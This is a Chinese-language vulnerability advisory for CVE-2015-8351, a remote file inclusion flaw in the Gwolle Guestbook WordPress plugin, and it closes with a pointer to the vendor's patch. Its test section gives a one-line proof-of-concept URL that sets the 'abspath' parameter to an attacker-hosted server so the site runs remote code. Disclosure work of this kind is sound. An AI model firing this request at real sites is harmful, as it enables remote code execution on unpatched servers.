Gwolle Guestbook WordPress插件远程文件包含漏洞(CVE-2015-8351)
发布日期:2015-11-20
更新日期:2015-12-01
受影响系统: Gwolle Guestbook Gwolle Guestbook 〈= 1.5.3 描述:CVE(CAN) ID: CVE-2015-8351
Gwolle Guestbook WordPress是WordPress站点的访问留言板插件。
Gwolle Guestbook WordPress 1.5.3及更早版本,未有效过滤"abspath" HTTP GET参数值,即用在PHP require()函数中,远程攻击者可从任意远程服务器包含名为'wp-load.php'的文件,并在受影响的Web服务器中执行。
<*来源:High-Tech Bridge Security Research Lab
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abs path=http://[hackers_website]
建议:厂商补丁:
Gwolle Guestbook
----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://wordpress.org/plugins/gwolle-gb/changelog/